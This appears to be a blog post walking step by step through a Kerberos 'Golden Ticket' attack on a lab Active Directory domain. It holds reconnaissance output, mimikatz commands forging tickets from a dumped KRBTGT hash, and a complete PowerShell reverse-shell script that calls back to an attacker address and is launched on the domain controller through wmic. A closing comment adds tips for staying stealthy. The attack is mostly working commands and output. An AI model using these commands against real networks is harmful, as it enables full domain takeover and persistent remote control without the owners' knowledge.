This is the second part of my previous post. Remember, you have the domain controller’s  dump of the hashes, but it’s the test lab and when you try to login via PTH (pass the hash), no way.. probably domain admin password was changed…

Game over?

Not at all.. we can try the “Golden Ticket” solution…

What is the Golden Ticket?

Before going ahead , a short recap on Microsoft Kerberos architecture:

kerberos1

In order to access resources on a Windows AD network using the Kerberos protocol, first of all you have to get a TGT ticket that you will use to request tickets for the requested services (TGS). Tickets are delivered by the KDC server service which runs on the domain controllers.

Got it? And here comes  the “Golden Ticket” attack, which permits you to create forged Kerberos Ticket Granting Tickets (TGT) offline to get unauthorized access , impersonating any domain user and that is good for 10 years or as long as you choose!

What should we need to create this Golden ticket?

  1. the domain name
  2. the AD domain security identifier (SID)
  3. a valid username (Administrator, of course!)
  4. the hash of the KRBTGT account

Domain name and domain is not an issue, for example you could use “enum4linux” tool on a Linux box (all you need is the ip address of DC):

#enum4linux 10.1.3.40
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Feb 14 22:10:13 2017

==========================
| Target Information |
==========================
Target ........... 10.1.3.40
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

=======================================================
| Enumerating Workgroup/Domain on 10.1.3.40 |
=======================================================
[+] Got domain/workgroup name: DUMMYCOMPANY

===============================================
| Nbtstat Information for 10.1.3.40 |
===============================================
Looking up status of 10.1.3.40
SERVER2012DC - B Workstation Service
DUMMYCOMPANY - B Domain/Workgroup Name
DUMMYCOMPANY - B Domain Controllers
SERVER2012DC - B File Server Service
DUMMYCOMPANY - B Domain Master Browser

MAC Address = 08-00-27-DC-6C-54
...
...

==============================================
| Getting domain SID for 10.1.3.40 |
==============================================
Domain Name: DUMMYCOMPANY
Domain Sid: S-1-5-21-3534665177-2148510708-2241433719
[+] Host is part of a domain (not a workgroup)
=========================================
| OS information on 10.1.3.40 |
=========================================
[+] Got OS info for 10.1.3.40 from smbclient: Domain=[DUMMYCOMPANY] OS=[Windows Server 2012 R2 Datacenter 9600] Server=[Windows Server 2012 R2 Datacenter 6.3]

You will get many “Acces Denied” because you are connecting  as anonymous user, but all the necessary stuff will be delivered to you 😉

In order to to get the FQDN of the domain, just try a simple reverse nslookup pointing to the DNS server hosted on DC:

# nslookup
> server 10.1.3.40
Default server: 10.1.3.40
Address: 10.1.3.40#53
> set q=ptr
> 10.1.3.40
Server: 10.1.3.40
Address: 10.1.3.40#53

40.3.2.10.in-addr.arpa name = server2012dc.dummycompany.local

Got it? Great!  and now  the last one, KRBTGT hash, but first of all, what is this account?

“The KRBTGT account is a local default account that acts as a service account for the Key Distribution Center (KDC) service. This account cannot be deleted, and the account name cannot be changed. The KRBTGT account cannot be enabled in Active Directory.”

And yes, we have the hashes of the password of  the KRBTGT account, remember?

The only problem we could face is that meantime the password of the “krbtgt” was changed,  but due to the severe impact of this operation on the entire domain, probably this will not be the case. Admins will change this password only if security issues occurs (such as a “Golden Ticket” evidence  😉 )

In brief, we have the following info:

  1. Domain name: DUMMYCOMPANY
  2. User name: Administrator
  3. SID: S-1-5-21-3534665177-2148510708-2241433719
  4. KRBTGT hash: 3003567af268a4a94e26f410e84353f1

Creating “Golden Tickets”

Time has come to put into  practise all we discussed above. First of all, fireup your Windows box with “mimikatz“installed!

On your Windows (virtual of physical) machine, logon with local admin rights, open an elevated command prompt and launch “mimikatz.exe”

mimikatz # kerberos::golden /admin:Administrator /domain:DUMMYDOMAIN.LOCAL /sid:S
-1-5-21-3534665177-2148510708-2241433719 /krbtgt:3003567af268a4a94e26f410e84353
f1 /ticket:admin.krb /ptt

User : Administrator
Domain : DUMMYDOMAIN.LOCAL (DUMMYDOMAIN)
SID : S-1-5-21-3534665177-2148510708-2241433719
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 3003567af268a4a94e26f410e84353f1 - rc4_hmac_nt
Lifetime : 2/14/2017 11:08:35 PM ; 2/12/2027 11:08:35 PM ; 2/12/2027 11:08:35 P
M
-> Ticket : admin.krb

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Final Ticket Saved to file !

So we told mimikatz to generate a “golden ticket”  for User Administrator on DUMMYDOMAIN.LOCAL with all the necessary parameters and generate it to a file for later use. The last option /ptt tells mimikatz to load directly the newly created ticket  in memroy, ready for “Pass The Ticket” operations.

Now, we can exit  mimikatz and from our command shell  list  the tickets:

C:\Users\Administrator\>klist

Current LogonId is 0:0x219fd

Cached Tickets: (1)

#0> Client: Administrator @ DUMMYDOMAIN.LOCAL
Server: krbtgt/DUMMYDOMAIN.LOCAL @ DUMMYDOMAIN.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 2/15/2017 7:14:56 (local)
End Time: 2/13/2027 7:14:56 (local)
Renew Time: 2/13/2027 7:14:56 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

Great! Finally we have our “Golden Ticket”, and look at the lifetime, 10 years!!

Does it work? Again finger crossed, let’s try to list contents of C: drive of domain controller.  But first of all,  map the server’s name in hosts file or point directly DNS server to the Domain Controller, it’s up to you! If you try to map the resource via IP address, NTLM authentication will take in place and all you will get is an “ACCESS DENIED”.

C:\Users\Administrator>dir \\server2012dc.dummydomain.local\c$
Volume in drive \\server2012dc.dummydomain.local\c$ has no label.
Volume Serial Number is A2D7-CEAD

Directory of \\server2012dc.dummydomain.local\c$

08/22/2013 07:52 AM PerfLogs
08/22/2013 06:50 AM Program Files
01/13/2017 10:35 PM PProgram Files (x86)
01/27/2017 03:57 AM temp
01/27/2017 02:43 AM test
01/27/2017 01:37 AM Users
...

Awesome! We list the contents of C:  drive belonging to   the domain controller “server2012dc”, we have Domain Admin privileges!!

Now let’s go further, having access to the filesystem (local or shared)  with Admin privilege is a great result, but we want more ..   what about a shell to interact with domain controller? This would be the big deal.. is it possible? Yes of course!

But ist’s not that easy: How can we get a get a remote shell authenticating with  kerberos ticket?

What should we need to accomplish this?

And here comes to play the fantastic MS build-in tool “wmic.exe”.

This tool is a command line front-end to the WMI (Windows Management Instrumentation) and guess what? It is possible to spawn processes on remote computers authenticating via kerberos!

First of all we need to get the right tickets (remember TGS?)  for WMI calls, basically 2:

  1. RPCSS: remote procedure call service ticket
  2. Host: host ticket to permit us to access other hosts

Again, with mimikatz we can do this without problems:

mimikatz # kerberos::golden /admin:administrator /domain:dummydomain.local /krbtgt
:3003567af268a4a94e26f410e84353f1 /sid:S-1-5-21-3534665177-2148510708-2241433719
/service:rpcss /ptt

mimikatz # kerberos::golden /admin:administrator /domain:dummydomain.local /krbtgt
:3003567af268a4a94e26f410e84353f1 /sid:S-1-5-21-3534665177-2148510708-2241433719
/service:host /ptt

Let’s check if it’s Ok:

C:\Users\Administrator>klist

Current LogonId is 0:0x219fd

Cached Tickets: (2)

#0> Client: administrator @ mydomainb.local
Server: host/mydomainb.local @ mydomainb.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 2/15/2017 9:38:23 (local)
End Time: 2/13/2027 9:38:23 (local)
Renew Time: 2/13/2027 9:38:23 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:

#1> Client: administrator @ mydomainb.local
Server: rpcss/mydomainb.local @ mydomainb.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 2/15/2017 9:38:13 (local)
End Time: 2/13/2027 9:38:13 (local)
Renew Time: 2/13/2027 9:38:13 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:

Good! We generated the necessary tickets, now it’s time to setup some type of remote   shell, for example meterpreter or whatever you want.. but we are PS fans, so let’s go for the powershell 😉

We will copy this reverse-shell script on the domain controller (assuming your ip is 10.1.2.40):

>c:\users\administrator\>type rev.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.1.2.40',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

c:\users\administrator\>copy rev.ps1 \\server2012dc.dummycompany.local\c$\windows\temp

After that, we can call the powershell script from wmic (remember to launch “nc -lp 8080” on your Linux box!) :

wmic /authority:"kerberos:DUMMYDOMAIN\SERVER2012DC" /node:server2012dc process call create "powershell -f c:\windows\temp\rev.ps1"

Finger crossed again 2 …. and take a look in our terminal:

connect to [10.1.2.40] from server2012dc.dummydomain.local [10.1.3.40] 62471

PS C:\Windows\system32>
PS C:\Windows\system32>
PS C:\Windows\system32> whoami
dummycompany\administrator

We dit it, great job!

That’all. 🙂

Advertisements

2 thoughts on “The “Golden Ticket” solution

  1. Just forgot to clarify these points:
    1) If you don’t create the service tickets (rpcss, host, cifs), windows will ask them for you. But we have to be as stealth as possible 😉
    2) You can also use psexec to get a remote shell (works with kerberos auth) but again, this will create the PSEXECV service on remote machine for all the duration of the shell. But again, we want to be stealth 😉

    Liked by 1 person

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s